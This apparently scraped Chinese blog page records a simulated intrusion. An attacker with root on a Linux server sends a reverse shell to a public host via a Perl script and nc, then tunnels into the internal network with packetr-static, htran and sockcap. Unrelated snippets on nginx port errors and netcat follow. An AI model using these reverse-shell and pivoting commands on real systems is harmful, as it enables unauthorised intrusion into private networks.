Linux下的内网反弹实例

最新推荐文章于 2021-04-30 00:43:17 发布
最新推荐文章于 2021-04-30 00:43:17 发布
阅读量77 收藏
点赞数
文章标签: 运维 shell
本文模拟了一个严格的环境:被攻陷的Linux服务器仅开放Web端口80,通过反弹shell到公网服务器,并利用packetr-static、htran及sockcap等工具进行数据转发与代理渗透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

遇到一个案例,细节不表,把在案例中的操作方法在本机模拟了下,记录之.

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机 192.168.1.109

工具:

packetr-static Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988

一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公网端执行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.运行代理程序进入内网

iteye_11341
关注
红队内网攻防渗透:内网渗透之内网对抗:Linux权限提升-&Vulnhub&Rbash绕过&Docker&LXD镜像&History泄漏
HACKONE的博客
06-15 323
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。Docker提供了一个容器镜像的集装箱模型,使得容器可以在不同的环境中进行移植和部署。而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。LXD是基于LXC容器的管理程序,当前用户可操作容器,理解为用户创建一个容器,再用容器挂载宿主机磁盘,LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
nginx报bind() to 0.0.0.0:443 failed错导致无法启动
liuqingup的专栏
06-25 3632
最近遇到了一个问题,启动Nginx时出现了"bind() to 0.0.0.0:443 failed"的错误,导致Nginx无法启动。
could not bind to address 0.0.0.0:443 no listening sockets available, shutting d
ldl_xz的专栏
03-17 829
could not bind to address 0.0.0.0:443 no listening sockets available, shutting d
Linux的capability深入分析(2)
wangpengqi的专栏
08-07 1万+
一)capability的工具介绍 在我们的试验环境是RHEL6,libcap-2.16软件包中包含了相关的capability设置及查看工作,如下: rpm -ql libcap-2.16-5.2.el6.i686  /lib/libcap.so.2 /lib/libcap.so.2.16 /lib/security/pam_cap.so
nginx 无法启动:bind() to 0.0.0.0:443 failed
牛奔的博客
12-04 4713
bind to 0.0.0.0:443 failed.其实就是443端口被其它程序占用,要结束占用443端口导致nginx不能启动的应用。 CMD: 1.查看所有程序使用的端口netstat -aon 也可以使用netstat -aon|findstr "443",直接找到使用443端口的程序: 可以看到PID为6416的程序占用了本机443端口。 接下来找到进程号为6416的程序,结束...
Linux下的内网反弹实例.txt
最新发布
01-09
Linux系统安全学习
Linux主机内网穿透
wyn_test的博客
07-28 1548
为什么写博客 大佬们都有个人主页或者优快云博客,本着计科学生的好奇精神,我也学习着,将近期的一个小项目写出来,望批评指正! 文章内容 不少同学会有这样的问题:在学校、公司或家里的个人电脑上搭建了个人网站或者配置了服务器,需要但是无法在其他地方访问到。这时可以利用另一台处于外网环境下的主机做一个转发,帮助外网访问到NAT后的内网环境下的服务器。 文章提供了亲测的两种简单而且稳定的工具,利用阿里云E...
python 实现socket通信实例之client.py
09-04
python 实现socket通信实例之client.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
python 实现socket通信实例之server.py
09-04
python 实现socket通信实例之server.py socket又称套间字或者插口,是网络通信中必不可少的工具。有道是:“无socket,不网络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
nc端口监听工具瑞士军刀
03-11
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为优快云博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.youkuaiyun.com/u012486730/article/details/82019996
linux怎么查看进程的套接字,linux – 如何找到哪个进程绑定套接字而不是监听?...
weixin_29051245的博客
04-30 175
当我使用nc来监听端口时,它会显示出来nc -l -vv -p 21000retrying local 0.0.0.0:21000 : Address already in use Can't grab 0.0.0.0:21000 with bind但是我无法使用工具netstat / ss找到哪个任务占用了这个端口netstat -an|grep 21000没有找到ss -a|grep 2100...
bind() to 0.0.0.0:443 failed (10013: An attempt was made to access a socket in a way forbidden by it
hukang00的专栏
11-26 3万+
bind() to 0.0.0.0:443 failed (10013: An attempt was made to access a socket in a way forbidden by it
could not bind to address 0.0.0.0.443 apache配置出错 排错教程
Ajax_A的博客
09-30 955
1.更改vm虚假主机内的首选项 中的是不是403如果是就更改如果不是就改第二步 2.更改Apache的conf文件夹内的extra中的httpd-ahssl.conf以及httpd-ssl.conf文件中的443字符串都改为442 这是博主找到的方法,如果可行 素质三连 ...
Linux内网反弹技巧总结与杂谈
u014389734的博客
07-08 1096
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
Nginx 启动报 [emerg] bind() to 0.0.0.0:XXXX failed (13: Permission denied)错误处理
热门推荐
RunSnail的博客
07-24 4万+
 系统启动Nginx后,报 [emerg] bind() to 0.0.0.0:XXXX failed (13: Permission denied)错误的处理方式,分为两种: 第一种:端口小于1024的情况: [emerg] bind() to 0.0.0.0:80 failed (13: Permission denied) 原因是1024以下端口启动时需要root权限,所以sudo ...
Bind for 0.0.0.0:80 failed: port is already allocated.解决方案
weixin_30591551的博客
04-24 5420
一句话总结就是容器占用的port还没有完全释放 查看进程,发现相关的容器并没有在运行,而 docker-proxy 却依然绑定着端口: $ docker ps 检查docker镜像 $ ps -aux | grep -v grep | grep docker-proxy 查看被docker-proxy占用的端口 停止 doker 进程,删除所有容器,然后...
Linux下通过WebShell反弹Shell的技巧
博文视点(北京)官方博客
10-27 5989
13.2 Linux下通过WebShell反弹Shell的技巧 Linux下通过WebShell反弹CmdShell,在网站服务器入侵提权过程中的应用比Windows环境下更广更频繁。 Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。 13.2.1 使用PHP WebShell木马反弹Sh
Linux内网渗透:反弹shell技术详解
"这份学习笔记整合了多种反弹shell的方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全和内网渗透领域的学习者。内容详尽地介绍了各种反弹shell的命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值